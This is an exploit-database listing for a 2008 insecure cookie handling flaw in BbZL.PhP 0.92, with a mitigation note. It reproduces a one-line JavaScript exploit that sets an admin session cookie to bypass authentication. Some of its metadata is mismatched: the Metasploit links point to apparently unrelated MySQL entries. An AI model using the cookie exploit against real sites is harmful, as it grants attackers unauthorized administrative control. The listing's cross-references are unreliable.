header-logo
Suggest Exploit
vendor:
BbZL.PhP
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: BbZL.PhP
Affected Version From: 0.92
Affected Version To: 0.92
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: o:bbzl:bbzl_php:0.92
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysql-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability

BbZL.PhP 0.92 is vulnerable to insecure cookie handling. An attacker can exploit this vulnerability by setting the phorum_admin_session cookie to 1. This will allow the attacker to gain administrative access to the application.

Mitigation:

Upgrade to the latest version of BbZL.PhP
Source

Exploit-DB raw data:

###############################################################################################
[+] BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack            
[+] Greetz : All my freind           
################################################################################################
Exploit:
javascript:document.cookie = "phorum_admin_session=1; path=/";

# milw0rm.com [2008-09-28]

Navigation

Suggest Exploit

Services By CQR